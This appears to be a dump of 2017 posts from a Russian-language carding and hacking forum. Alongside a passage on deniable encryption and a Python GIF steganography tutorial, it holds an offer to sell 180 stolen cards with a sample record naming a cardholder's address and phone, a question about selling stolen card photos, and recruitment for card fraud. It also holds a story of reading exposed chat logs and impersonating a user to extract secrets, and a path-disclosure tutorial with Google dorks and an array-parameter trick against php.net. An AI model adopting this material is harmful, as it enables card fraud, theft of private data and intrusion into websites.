этом. Если злоумышленник в состоянии проникнуть в помещение, где установлен компьютер, он вряд ли будет возиться с программой, а просто установит скрытую камеру в стене, подслушивающее устройство в телефон или датчик для ретрансляции электромагнитного излучения в компьютер. В конце концов, если злоумышленник может беспрепятственно вс это сделать, сражение с ним уже проиграно, даже не начавшись.</p> <p>Сжатие и шифрование</p> <p>Алгоритмы сжатия данных очень хорошо подходят для совместного использования с криптографическими алгоритмами. На это есть две причины:</p> <p>- При вскрытии шифра криптоаналитик более всего полагается на избыточность, свойственную любому открытому тексту. Сжатие помогает избавиться от этой избыточности.</p> <p>- Шифрование данных является весьма трудо мкой операцией. При сжатии уменьшается длина открытого текста, и тем самым сокращается время, которое будет потрачено на его шифрование.</p> <p>Надо только не забыть сжать файл до того, как он будет зашифрован, а не после. После шифрования файла при помощи качественного криптографического алгоритма полученный шифртекст сжать не удастся, поскольку его характеристики будут близки к характеристикам совершенно случайного набора букв. Кстати, сжатие может служить своеобразным тестом для проверки качества криптографического алгоритма: если шифртекст подда тся сжатию, значит этот алгоритм лучше заменить на более совершенный.</p> <p>Как спрятать один шифртекст в другом</p> <p>Предположим, что две гипотетические личности по имени Антон и Борис несколько месяцев обменивались шифрованными сообщениями. Контрразведка перехватила все эти сообщения, но так и не смогла прочесть ни единого слова. Контрразведчикам надоело коллекционировать переписку Антона и Бориса, не зная е содержания, и они решили арестовать подозрительную парочку. Первый же допрос начался словами: &quot;Где ключи к шифру?&quot;. &quot;К какому такому шифру?!&quot; - в один голос воскликнули Антон и Борис, но тут же осеклись и побледнели, заметив на столе у следователя зловещего вида клещи, покрытые пятнами то ли ржавчины, то ли крови.</p> <p>Антон и Борис смогли бы выкрутится из создавшегося положения, если бы шифровали каждое сво сообщение так, чтобы оно допускало два различных расшифрования в зависимости от используемого ключа. Сво настоящее секретное сообщение Борису Антон мог бы зашифровать на одном ключе, а вполне невинный открытый текст - на другом. Теперь, если от Антона потребуют ключ к шифру, он отдаст подставной ключ, который позволит прочесть совершенно невинное сообщение, а ключ от настоящего сообщения сохранит в тайне.</p> <p>Самый простой способ сделать это потребует использования одноразового блокнота. Пусть P - настоящий открытый текст, D - невинный открытый текст, C - шифрованный текст, K - настоящий ключ, а - подставной ключ. Антон шифрует P:</p> <p>P A K = C</p> <p>Поскольку у Бориса имеется копия ключа K, он может без проблем расшифровать сообщение Антона:</p> <p>C A K = P</p> <p>Если контрразведчики попытаются заставить Антона и Бориса выдать используемый ими ключ, вместо K они могут сообщить в контрразведку:</p> <p>K = C A D</p> <p>В результате контрразведчики смогут прочитать невинный открытый текст:</p> <p>C A K = D</p> <p>Так как Антон и Борис пользуются одноразовым блокнотом, то K является полностью случайным и доказать, что является подставным ключом, практически невозможно (не прибегая к пыткам).</p> <p>Антон мог бы зашифровать P не с помощью одноразового блокнота, а пользуясь любым из своих самых любимых криптографических алгоритмов и ключом K. Сложив C с отрезком какого-либо общеизвестного произведения (например, с отрывком из второй главы &quot;Идиота&quot; Достоевского) по модулю 2, Антон получит K . Теперь если к Антону пристанут &quot;дяденьки&quot; из контрразведки, он предъявит им C вместе с K и скажет, что K - это одноразовый блокнот для C и что он просто захотел попрактиковаться в криптографии, зашифровав для этой цели отрывок из первой попавшейся книги. И пока контрразведчики не получат в сво распоряжение ключ K, доказать, что Антон занимался чем-то противозаконным, они не смогут.</p> mybb@mybb.ru (Alex25) Sat, 11 Feb 2017 17:00:29 +0300 https://carton.forum.cool/viewtopic.php?pid=30#p30 https://carton.forum.cool/viewtopic.php?pid=29#p29 <div class="quote-box quote-main"><blockquote><p>Преступление в том, что вместо выполнения своих обязанностей, все силы бросаются на создание ещё одного института, который впоследствии также отклонится от всего, ради достижения одной цели, это опять плодить ещё один чиновничий институт</p></blockquote></div><p>Дети чиновников растут,ну не на завод же их. Вот и приходиться устраивать. Забота о детях это свято. Чего же тут удивительного?</p> mybb@mybb.ru (FedorDobr) Fri, 10 Feb 2017 23:00:24 +0300 https://carton.forum.cool/viewtopic.php?pid=29#p29 https://carton.forum.cool/viewtopic.php?pid=25#p25 <p><a href="http://uploads.ru/Uprqi.jpg" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="https://sf.uploads.ru/t/Uprqi.jpg" alt="http://sf.uploads.ru/t/Uprqi.jpg" /></a><br />В рамках борьбы с хакерами США намерены объединиться с Израилем, который начал активно продвигать идею школьного и дошкольного образования в области кибербезопасности. Зачем стране настолько молодые специалисты и какая цель у детских «киберлагерей» — в материале «Газеты.Ru».</p> <p>В конгресс США был внесен законопроект, согласно которому американские власти и Израиль объединят усилия в борьбе с киберугрозами. В случае его принятия министерство внутренней безопасности на протяжении семи лет будет спонсировать ведущих специалистов обеих стран, которые будут разрабатывать разные средства защиты от хакеров.</p> <p>Инициатором законопроекта выступил член нижней палаты конгресса демократ Джеймс Лэнджевин. «Кибербезопасность — основа национальной и экономической безопасности. Соединенные Штаты и Израиль должны работать вместе, чтобы внедрять инновационные решения по борьбе с угрозами, с которыми мы сталкиваемся онлайн», — заявил конгрессмен.</p> <p>Сначала алфавит, потом кодинг</p> <p>В попытке стать мировым лидером в области кибербезопасности и технологий Израиль делает ставку на подрастающее поколение.</p> <p>В некоторых израильских школах четвероклассники изучают программирование, а одаренные молодые люди 16 лет посещают внеклассные занятия, на которых изучают тактику шифрования, кодирование, а также методы противодействия хакерским атакам.</p> <p>В стране даже появилось два детских сада, в которых преподают компьютерную грамотность и основы робототехники. </p> <p>Такие программы обучения свидетельствуют о том, что Израиль решил заняться воспитанием будущих программистов еще на стадии дошкольного образования.</p> <p>Эту же цель будет преследовать Национальный центр киберобразования (НЦК), который займется формированием пула талантливой молодежи. Впоследствии они продолжат свою карьеру в военной разведке, хай-тек-индустрии или станут учеными.</p> <p>Читать полностью:<br /><a href="https://www.gazeta.ru/tech/2017/02/09/10516895/hacker_babies.shtml" rel="nofollow" target="_blank">https://www.gazeta.ru/tech/2017/02/09/1 &#8230; bies.shtml</a></p> mybb@mybb.ru (GrantGarant) Fri, 10 Feb 2017 22:51:58 +0300 https://carton.forum.cool/viewtopic.php?pid=25#p25 https://carton.forum.cool/viewtopic.php?pid=24#p24 <p>Годнота</p> mybb@mybb.ru (FedorDobr) Fri, 10 Feb 2017 19:23:52 +0300 https://carton.forum.cool/viewtopic.php?pid=24#p24 https://carton.forum.cool/viewtopic.php?pid=21#p21 <p>Міністерство внутрішніх справ України оголошує конкурс на заміщення вакантних посад інспекторів та спецагентів інформаційних технологій<br />ОБОВ’ЯЗКИ ІНСПЕКТОРІВ ТА СПЕЦАГЕНТІВ:<br />Отримання, аналіз та використання інформації з відкритих джерел<br />Надання допомоги в режимі реального часу потерпілим від дій:<br />&#160; &#160;- порушувачів авторського права;<br />&#160; &#160;- кардерів;<br />&#160; &#160;- викрадачів приватних даних;<br />&#160; &#160;- онлайн-шахраїв;<br />&#160; &#160;- розповсюджувачів забороненого контенту.<br />Протидія поширенню інформації терористичного характеру в<br />українському сегменті мережі&#160; Інтернет<br />Протидія злочинам у сфері інформаційної безпеки<br />Протидія порушенням встановленого порядку маршрутизації<br />телефонного трафіку<br />Обмін інформацією з іноземними партнерами за допомогою<br />Національного контактного пункту<br />Что интересно из этого получиться?!))</p> mybb@mybb.ru (DoradO_o) Fri, 10 Feb 2017 19:20:04 +0300 https://carton.forum.cool/viewtopic.php?pid=21#p21 https://carton.forum.cool/viewtopic.php?pid=20#p20 <p>Всегда так делаю, + в карму&#160; :cool:</p> mybb@mybb.ru (DoradO_o) Fri, 10 Feb 2017 19:18:56 +0300 https://carton.forum.cool/viewtopic.php?pid=20#p20 https://carton.forum.cool/viewtopic.php?pid=19#p19 <p>Срочно продам базу 180 шт, 150ЮСА, 30Европа.Выборочно отчекана сегодня, высокий валид.Слито с жирного шопа.Работаю через гаранта.<br />Прошу 150$, возможен торг<br />База в таком формате:<br />542966**********|10|2018|798|UNITED STATES|Jeremy Thompson/612 Marr Dr|Signal Mtn|TN|37377|423-718-4943|<br />Связь только в ЛС</p> mybb@mybb.ru (DoradO_o) Fri, 10 Feb 2017 19:16:30 +0300 https://carton.forum.cool/viewtopic.php?pid=19#p19 https://carton.forum.cool/viewtopic.php?pid=17#p17 <div class="quote-box answer-box"><cite>FedorDobr написал(а):</cite><blockquote><p>Интересная тема, думаю еще лет 5 мы этого не увидем</p></blockquote></div><p>Не знаю, не знаю. В нашем мире возможно все, может быть уже на следующий год мы увидим это технологию и в СНГ</p> mybb@mybb.ru (Ванька) Fri, 10 Feb 2017 19:08:02 +0300 https://carton.forum.cool/viewtopic.php?pid=17#p17 https://carton.forum.cool/viewtopic.php?pid=14#p14 <p>ашол почту с фотками карт а этот тип&#160; пендос их в почте оставил. и на них подключен амазон за сколько можно это все продать?</p> mybb@mybb.ru (Ванька) Fri, 10 Feb 2017 18:56:12 +0300 https://carton.forum.cool/viewtopic.php?pid=14#p14 https://carton.forum.cool/viewtopic.php?pid=12#p12 <p>Недавно нас окатило волной громких скандалов, разразившихся словно гром среди ясного неба, одним из самых громких среди них было раскрытие программы PRISM.<br />Итак, давайте представим такую ситуацию: есть два человека, которые хотят обмениваться сообщениями с секретной информацией, есть люди, желающие заполучить эту информацию. Одним из самых разумных решений данной проблемы может стать обмен сообщениями через открытые источники с использованием стеганографии.<br />Например, пользователь1 оставляет на форуме смищную гифку с милым котэ, в недрах которой скрывается какое-то тайное послание. Для человеческого глаза, скорей всего, будет незаметно легкое искажение цветов, которое вполне можно списать на низкое качество картинки, а вот пользователь2, обладающий специальной программой и ключем без проблем получит из картинки информацию.<br />[Intro]&#8203;<br />Для начала давайте поговорим о теории.<br />Стеганография, которой посвящена данная статья, это, по сути, искуство сокрытия информации от посторонних глаз.<br />Существует множество разных способов спрятать данные на виду, мы же прибегнем к модифицированному LSB(Least Significant Bit, наименьший значащий бит, подробнее о нем можно почитать в Википедии, скажу лишь, что данные при таком подходе прячутся в последние значащие биты, таким образом очень слабо влияя на значения байтов): будем менять 4 наименее значащих бита. Да, это намного более значительные изменения, но как показывает практика, изменение в значении цвета на 15(из 255 возможных) пунктов легко пропустить, не имея оригинала, что бы сравнить.<br />Вот кстати пример:<br />--<br />одно из этих изображений оригинал, другое копия с небольшим посланием.<br />[Кодим]&#8203;<br />Я буду писать на питоне, этот язык понятен почти всем, даже тем, кто его не знает. Код писался и тестировался под python3, как будет работать под второй веткой неизвестно.<br />Для начала можно ознакомиться с описанием формата вот тут Там все очень кратко, но достаточно полезно для понимания кода. Суть нашего кода будет предельно простой: зашифровать сообщение(максимальная длинна 384 байта) и положить его в главную палитру файла.<br />В формате используются битовые поля, но в питоне, как оказалось, нет стандартной из реализации, поэтому пришлось городить свой костыль:</p><div class="quote-box spoiler-box"><div onclick="$(this).toggleClass('visible'); $(this).next().toggleClass('visible');">Текст</div><blockquote><p>class BitArray:<br />&#160; &#160; def __init__(self, val=None, length=0):<br />&#160; &#160; &#160; &#160; bits=[]<br />&#160; &#160; &#160; &#160; if type(val) is int:<br />&#160; &#160; &#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; &#160; &#160; while(val!=0):<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; if val&amp;1:<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; bits+=[1]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; else:<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; bits+=[0]<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; val&gt;&gt;=1<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; elif type(val) is list:<br />&#160; &#160; &#160; &#160; &#160; &#160; bits=list(val)<br />&#160; &#160; &#160; &#160; if bits==[]:<br />&#160; &#160; &#160; &#160; &#160; &#160; bits=[0]<br />&#160; &#160; &#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; if length!=0:<br />&#160; &#160; &#160; &#160; &#160; &#160; if length&gt;=len(bits):<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; bits=bits+[0]*(length-len(bits))<br />&#160; &#160; &#160; &#160; &#160; &#160; else:<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; raise Exception(&quot;val too long&quot;)<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; self._val=bits<br />&#160; &#160; #индексатор, возвращающий объект BitArray<br />&#160; &#160; def __getitem__(self, item):<br />&#160; &#160; &#160; &#160; return self.__class__(self._val[item])<br />&#160; &#160; #длинна в битах<br />&#160; &#160; def __len__(self):<br />&#160; &#160; &#160; &#160; return len(self._val)<br />&#160; &#160; #исключительно для отладки, наглядное представление объекта для интерактивного режима<br />&#160; &#160; def __repr__(self):<br />&#160; &#160; &#160; &#160; bits=self._val<br />&#160; &#160; &#160; &#160; bits.reverse()<br />&#160; &#160; &#160; &#160; return str(self.__class__)+&quot; Bits: &quot;+&quot;&quot;.join(str(x) for x in bits)+&quot;; val: &quot;+str(int(self))<br />&#160; &#160; #приведение к int<br />&#160; &#160; def __int__(self):<br />&#160; &#160; &#160; &#160; res=0<br />&#160; &#160; &#160; &#160; for i in range(len(self._val)):<br />&#160; &#160; &#160; &#160; &#160; &#160; res|=self._val[i]&lt;&lt;i<br />&#160; &#160; &#160; &#160; return res<br />&#160; &#160; <br />&#160; &#160; def __add__(self, ba):<br />&#160; &#160; &#160; &#160; self._val+=ba._val<br />&#160; &#160; &#160; &#160; return self</p></blockquote></div><p>Поскольку писать универсальный массив не хотелось, в классе только необходимый для конкретно этого проекта функционал, ничего лишнего.<br />Теперь давайте опишем такой же минималистичный класс для работы с gif-файлом:</p><div class="quote-box spoiler-box"><div onclick="$(this).toggleClass('visible'); $(this).next().toggleClass('visible');">текст</div><blockquote><p>class Gif:<br />&#160; &#160; #http://www.onicos.com/staff/iz/formats/gif.html<br />&#160; &#160; def __init__(self, data):<br />&#160; &#160; &#160; &#160; self._header=data[:6]<br />&#160; &#160; &#160; &#160; self._info=data[6:12]<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; info=BitArray(self._info[4])<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; if int(info[0])!=1:<br />&#160; &#160; &#160; &#160; &#160; &#160; raise Exception(&quot;This file haven't global pallet&quot;)<br />&#160; &#160; &#160; &#160; tblsize=2**(1+int(info[5:]))<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; pallet=data[12:12+tblsize*3]<br />&#160; &#160; &#160; &#160; self._data=data[12+tblsize*3:]#все, с чем не умеем работать храним в неизменном виде<br />&#160; &#160; &#160; &#160; self._pallet=pallet<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; def putData(self, data):<br />&#160; &#160; &#160; &#160; data=list(data)<br />&#160; &#160; &#160; &#160; maxlen=len(self._pallet)*.5 #максимальная длинна данных, которые вместит файл<br />&#160; &#160; &#160; &#160; data=list(len(data).to_bytes(2,&quot;little&quot;))+data #добвляем в начало длинну данных<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; if maxlen&gt;=len(data):<br />&#160; &#160; &#160; &#160; &#160; &#160; data+=[0]*int(maxlen-len(data)) #при необходимости дополняем нулями наше смообщение<br />&#160; &#160; &#160; &#160; else:<br />&#160; &#160; &#160; &#160; &#160; &#160; raise Exception(&quot;Can't insert {0} bytes of data in {1}&quot;.format(len(data),maxlen))<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; rdata=[]<br />&#160; &#160; &#160; &#160; for d in data: #разбиваем каждый байт на две части<br />&#160; &#160; &#160; &#160; &#160; &#160; ba=BitArray(d)<br />&#160; &#160; &#160; &#160; &#160; &#160; rdata+=[int(ba[:4]),int(ba[4:])]<br />&#160; &#160; &#160; &#160; data=rdata<br />&#160; &#160; &#160; &#160; self._pallet=[(int(x) &amp; 0b11110000) for x in list(self._pallet)] #очищаем младшие биты каждого байта в палитре<br />&#160; &#160; &#160; &#160; self._pallet=[(self._pallet[i]|data[i]) for i in range(len(data))] #ложим данные в палитру<br />&#160; &#160; def getData(self):<br />&#160; &#160; &#160; &#160; data=[(self._pallet[i]&amp;0xf) for i in range(len(self._pallet))] #удаляем ненужные нам биты<br />&#160; &#160; &#160; &#160; data=[int(BitArray(data[i],4)+BitArray(data[i+1],4)) for i in range(0,len(data),2)] #складываем байты из двух частей<br />&#160; &#160; &#160; &#160; l=int.from_bytes(data[:2],&quot;little&quot;)<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; return data[2:2+l]<br />&#160; &#160; def construct(self):<br />&#160; &#160; &#160; &#160; #собираем файл из частей<br />&#160; &#160; &#160; &#160; return self._header+self._info+bytes(self._pallet)+self._data</p></blockquote></div><p>Надеюсь, коментов в коде достаточно для его понимания, но если нет -- задавайте вопросы, на все отвечу.<br />[Шифруемся]&#8203;<br />Поскольку одной из целей было создать код, не зависящий от сторонних библиотек, а в питоне нет ничего кроме хешфункций, было принято решение просто гаммировать данные хитрым хешем пароля:</p><div class="quote-box spoiler-box"><div onclick="$(this).toggleClass('visible'); $(this).next().toggleClass('visible');">текст</div><blockquote><p>import hashlib<br />#генератор гаммы для шифрования<br />#не лучший вариант, но и не худший:)<br />def GammaString(secret):<br />&#160; &#160; if type(secret) is str:<br />&#160; &#160; &#160; &#160; secret=secret.encode()<br />&#160; &#160; md5=hashlib.md5()<br />&#160; &#160; sha=hashlib.sha512()<br />&#160; &#160; md5.update(secret)<br />&#160; &#160; sha.update(secret)<br />&#160; &#160; <br />&#160; &#160; while True:<br />&#160; &#160; &#160; &#160; digest=md5.digest()+sha.digest()<br />&#160; &#160; &#160; &#160; for d in digest:<br />&#160; &#160; &#160; &#160; &#160; &#160; yield d<br />&#160; &#160; &#160; &#160; md5.update(digest)<br />&#160; &#160; &#160; &#160; sha.update(digest)<br />#опять таки не лучший вариант<br />def xor(data, secret):<br />&#160; &#160; if type(data) is str:<br />&#160; &#160; &#160; &#160; data=data.encode()<br />&#160; &#160; gamma=GammaString(secret)<br />&#160; &#160; return bytes(d^next(gamma) for d in data)</p></blockquote></div><p>Коротко о сути работы GammaString: этот генератор сначала берет md5 и sha512 хэши пароля, после чего складывает их в один digest и посимвольно отдает в функцию гаммирования, когда этот digest заканчивается, берется его md5 и sha512 хеши и складываются в новый digest и все начинается с начала, таким образом мы получаем почти бесконечную довольно качественную гамму.<br />[Интерфейс]&#8203;<br />Поскольку это просто заготовка, интерфейс будет консольным, за него отвечает следующий код:</p><div class="quote-box spoiler-box"><div onclick="$(this).toggleClass('visible'); $(this).next().toggleClass('visible');">текст</div><blockquote><p>import chipher<br />from giffile import Gif<br />import sys<br />usage=&quot;&quot;&quot;<br />Using {0}:<br />&#160; &#160; {0} &lt;put|get&gt; &lt;-s&quot;password&quot;|-sf&quot;pwdfile&quot;&gt; [&lt;-d&quot;data string&quot;|-df&quot;datafile&quot;&gt;] &lt;-g&quot;gif container&quot;&gt; [&lt;-o&quot;out file name&quot;&gt;]<br />Parameters:<br />&#160; &#160; put \t put data to container<br />&#160; &#160; get \t get data from container<br />&#160; &#160; -s&quot;password&quot; \t set chiping password<br />&#160; &#160; -sf&quot;pwdfile&quot; \t using as pwd content of file<br />&#160; &#160; -d&quot;data string&quot; \t set chiping text, must be ignored when get<br />&#160; &#160; -df&quot;datafile&quot; \t using text of file as chiping text, must be ignored when get<br />&#160; &#160; &lt;-g&quot;gif container&quot;&gt; \t set gif container<br />&#160; &#160; &lt;-o&quot;out file name&quot;&gt; \t set output, if ignored put out to console<br />&quot;&quot;&quot;<br />def main(argv):<br />&#160; &#160; gif=&quot;&quot;<br />&#160; &#160; data=&quot;&quot;<br />&#160; &#160; secret=&quot;&quot;<br />&#160; &#160; out=&quot;&quot;<br />&#160; &#160; action=&quot;put&quot;<br />&#160; <br />&#160; &#160; for arg in argv:<br />&#160; &#160; &#160; &#160; if arg.startswith(&quot;-s&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; secret=arg[3:-1]<br />&#160; &#160; &#160; &#160; elif arg.startswith(&quot;-d&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; data=arg[3:-1]<br />&#160; &#160; &#160; &#160; elif arg.startswith(&quot;-sf&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; secret=open(arg[3:-1],&quot;rb&quot;).read()<br />&#160; &#160; &#160; &#160; elif arg.startswith(&quot;-df&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; data=open(arg[3:-1],&quot;rb&quot;).read()<br />&#160; &#160; &#160; &#160; elif arg.startswith(&quot;-g&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; gif=open(arg[3:-1],&quot;rb&quot;).read()<br />&#160; &#160; &#160; &#160; elif arg.startswith(&quot;-o&quot;):<br />&#160; &#160; &#160; &#160; &#160; &#160; out=arg[3:-1]<br />&#160; &#160; &#160; &#160; elif arg==&quot;put&quot;:<br />&#160; &#160; &#160; &#160; &#160; &#160; action=&quot;put&quot;<br />&#160; &#160; &#160; &#160; elif arg==&quot;get&quot;:<br />&#160; &#160; &#160; &#160; &#160; &#160; action=&quot;get&quot;<br />&#160; &#160; if gif==&quot;&quot; or secret==&quot;&quot;:<br />&#160; &#160; &#160; &#160; print(usage)<br />&#160; &#160; &#160; &#160; return<br />&#160; &#160; gif=Gif(gif)<br />&#160; &#160; res=b&quot;&quot;<br />&#160; &#160; <br />&#160; &#160; if action==&quot;put&quot;:<br />&#160; &#160; &#160; &#160; if data==&quot;&quot;:<br />&#160; &#160; &#160; &#160; &#160; &#160; print(usage)<br />&#160; &#160; &#160; &#160; &#160; &#160; return<br />&#160; &#160; &#160; &#160; <br />&#160; &#160; &#160; &#160; data=chipher.xor(data,secret)<br />&#160; &#160; &#160; &#160; gif.putData(data)<br />&#160; &#160; &#160; &#160; res=gif.construct()<br />&#160; &#160; elif action==&quot;get&quot;:<br />&#160; &#160; &#160; &#160; res=chipher.xor(gif.getData(),secret)<br />&#160; &#160; if out==&quot;&quot;:<br />&#160; &#160; &#160; &#160; try:<br />&#160; &#160; &#160; &#160; &#160; &#160; print(res.decode())<br />&#160; &#160; &#160; &#160; except:<br />&#160; &#160; &#160; &#160; &#160; &#160; print(&quot;Can't decode content as string, use -o parameter&quot;)<br />&#160; &#160; &#160; &#160; &#160; &#160; print(res)<br />&#160; &#160; &#160; &#160; &#160; &#160; return<br />&#160; &#160; else:<br />&#160; &#160; &#160; &#160; with open(out,&quot;wb&quot;) as f:<br />&#160; &#160; &#160; &#160; &#160; &#160; f.write(res)<br />if __name__==&quot;main&quot;:<br />&#160; &#160; main(sys.argv)</p></blockquote></div><p>Как видите, все весьма просто. Останавливаться на нем, я пожалуй не буду, код кривой, но вроде рабочий.<br />[В заключение]&#8203;<br />Определить наличие в файле зашифрованных скрытых данных может быть весьма сложно, особенно не зная пароля. Попробуйте угадать в какой из картинок скрыто сообщение(просто) и какое(сложнее). Подсказка: там секретные данные.</p> mybb@mybb.ru (Ванька) Fri, 10 Feb 2017 18:52:28 +0300 https://carton.forum.cool/viewtopic.php?pid=12#p12 https://carton.forum.cool/viewtopic.php?pid=11#p11 <p>Всем привет, что то я в писатели подался =) Надеюсь кому то интересно, то что я вам рассказываю. И так &quot;Стартуем или я начну стрелять&quot; <br />Решил я как то раз вспомнить молодость, думаю - дай ка завалюсь на какой ни будь чат и потреплюсь о то о сем. Забив в гугл запрос &quot;чат без регистрации&quot; он мне выдал кучу ссылок, я выбрал один из них и зашел в умопомрачительное место. Ночной призрак обсуждал, что то с Нимфоманкой (было понятно, что знакомы они не один день). БабкаФкедах тролила всех. В общем 80% были постоянные посетители чата. Потупив и по обсуждая с жителями чата разные новости, я решил, а дай ка посмотрим, как чат чувствует себя изнутри. Не буду хвастать и врать, что я сидел изучал исходники, все поля перелапатил и тд. Нет, поступил по дилетантски, так как характер взлома был - ради прикола, а не ради того, что бы положить все и вся на своем пути. Начал дописывать к урлу все, что приходило в голову на тот момент. какойточат.ру/admin , какойточат.ру/administrator и тд. Админку я естественно нашел, но не в том суть. Не пытаясь в нее пробиться, найти в БД логин и пасс админа. Я решил поступить намного проще. Если есть админка, значит админ должен что то делать. Не так ли? Следить за спамом, банить и тд. А что бы следить за всем этим, нужен лог чата. Верно? Верно. И тут я запустил nikto и пошел курить. Вернувшись никтошенька сказал - какойточат.ру/users/logs/ может быт интересным. Ну если говорит так, значит посмотрим =) Открыв урл,моему виду представился список юзеров, всех кто бы в чате, начиная от зарегистрированных, заканчивая гостями, с временными никами. Нажав на каждый из них, я мог посмотреть всю его переписку, ip адресс с которого он заходил и тд. Ни чего себе, да? Я быстренько вышел из чата, под ником Oxygen и зашел под ником якобы знакомого Нимфоманки, в итоге она мне открыла много своих секретов, ведь я же был не Oxygen, а ее хорошим другом чата, ведь я знал, о чем они общались в привате =) А теперь представьте, что можно узнать о людях, зная их друзей и их секреты, в сети. Да я знаю, статья средненькая. Но наводит на некоторые мысли. Главное, не то где вы и что вы получили, а то, как вы этим воспользовались. Всем спасибо за внимание и до новых встреч.</p> mybb@mybb.ru (Ванька) Fri, 10 Feb 2017 18:49:45 +0300 https://carton.forum.cool/viewtopic.php?pid=11#p11 https://carton.forum.cool/viewtopic.php?pid=10#p10 <div class="quote-box answer-box"><cite>СЕРБ написал(а):</cite><blockquote><p>Требуется пару человек. Вбив палки, сс <br />оплата ежедневно. Золотые горы не обещаю, примерный профит в день 80$ за 2 вбива<br />За подробностями в лс туда и скину жабу</p></blockquote></div> <p>Есть свободное время, можем по работать</p> mybb@mybb.ru (Ванька) Fri, 10 Feb 2017 18:48:31 +0300 https://carton.forum.cool/viewtopic.php?pid=10#p10 https://carton.forum.cool/viewtopic.php?pid=8#p8 <p>Любой мало-мальски серьезный взлом требует основательной подготовки, анализа сервера, самого сайта, софта. Пока мы не попали внутрь, мы не знаем иерархии сервера и не можем адекватно ориентироваться в путях. Например, документ index.php может лежать как в /home/target.com/docs/index.php, так и в любом месте с похожим, а порою вовсе не похожим адресом. Чтобы знать точно иерархию, надо встать на колени перед сервером, помолиться и попросить его &quot;раскрыть путь&quot; — что по англицки значится как &quot;path disclosure&quot;.<br />Для чего использовать эту информацию? Ну например: у вас есть уязвимость на локальный include и возможность закачать аттачмент на форум — но вы не знаете, какой адрес (даже относительный) у папки аттачментов форума, а наугад найти не получилось. Приходится искать другими методами — более осмысленными — большая часть из них описана ниже.<br />Поскольку примерно половина скриптов в мире написано на языке php, я буду говорить про раскрытие пути в PHP-скриптах, кстати, смею заметить, именно в php это сделать легче всего, разработчики не поскупились — почти в любой ошибке указан абсолютный адрес файла :).<br />Google — первый помощник в делах путевых<br />Самый простой, и чаще всего самый эффективный способ найти &quot;баги&quot; — использовать Google. Во-первых, он лучше всех индексирует ошибки, во-вторых, у него есть кэш, который нам и понадобится. Если не выключены ошибки (если выключены — найти путь в сотню раз сложнее), то при обработке бажного скрипта на экран выведется что-то вроде<br />Warning: Cannot modify header information — headers already sent by (output started at /home/local/Web/sites/www.php.net/include/site.inc:155) in /home/local/Web/sites/www.php.net/include/layout.inc on line 80<br />Вот путь и раскрыт. (Надо заметить, что раскрывается абсолютный путь, что очень полезно). Нам надо найти такие бажные страницы на заданном сервере. Простые примеры запросов для поиска кривых страниц через google:<br />&quot;headers already sent&quot; site:victim.ru — ошибки при отправке хидеров самые популярные.<br />&quot;mysql_connect&quot; site:victim.ru — mysql очень любит ругаться, почем зря. Мы тоже любим mysql &#128521;<br />&quot;failed to open stream&quot; site:victim.ru — ошибки, связанные с чтением файлов.<br />Если всё это не помогает, можно попробовать поискать просто &quot;Warning&quot; — и долго копаться в результатах. Самое интересное, что часто баги, которые находит гугл, могут быть уже закрыты (например, ошибка too many connections в mysql — штука редкая, временная, но полезная). В таких случаях надо не забывать про пимпу &quot;Сохранено в кэше&quot;, которая есть рядом почти с каждым результатом в гугле. На странице кэша любезно сохранена вся информация об ошибке, вместе с путем.<br />Если поисковик не выдал интересных результатов, отчаиваться не стоит. Гугл всё равно крут, попробуй найти поддомены для анализируемого сайта — простой запрос inurl:nasa.gov выдаст все проиндексированные поддомены сайта, на которых тоже можно поискать &quot;path disclosure&quot;. Для всех поисков можно написать автомат-парсер, и это довольно просто, но придумано для лентяев (или тех, кто ломает по 500 сайтов в день), поэтому описывать его здесь не вижу смысла.<br />Поиск информации о &quot;path disclosure&quot; для конкретных приложений<br />Всегда можно пойти путем скрипт кидисов и залезть на багтрек. К примеру, на сервере стоит phpMyAdmin версии 2.6.*, и доступ к панели залогинивания мы уже нашли. Нам опять поможет священный гугль — запрос phpmyadmin 2.6 path disclosure порадует нас обилием подсказок. Самое интересное, что далеко не каждая компания, пишущая софт, спешит залатать такие баги в своих ваяниях. Почти всегда можно найти какой-нибудь глупый скрипт, который так и говорит &quot;ну узнай же у меня путь, возьми меня!&quot;.<br />Ручные методы — работает даже на php.net &#128521;<br />Начать ручное сканирование можно с осмотра страниц — тыкай себе разные кнопки и ссылки, есть вероятность, что что-нибудь, да отыщешь. Говённый метод, надо сказать, хотя не раз помогал. Мой любимый способ — это передача массивов. Чтобы не вдаваться в детали, могу сразу привести пример на незабвенном php.net.<br /><a href="http://php.net/?lang" rel="nofollow" target="_blank">http://php.net/?lang</a>[]=hacked тут же расскажет нам, где деньги лежат (кстати, покажет много интересных вещей — например, ссылку на <a href="http://php.net/include/site.inc" rel="nofollow" target="_blank">http://php.net/include/site.inc</a>).<br />Так-то, а кто-то ещё говорил, что path disclosure — очень слабая уязвимость! Как видно из ссылки, уязвимость кроется в паре квадратных скобок, а именно при их помощи задаётся массив в php. Их можно загонять в любые переменные, передаваемые на сервер — добавляем в конце квадратные скобки и злобненько 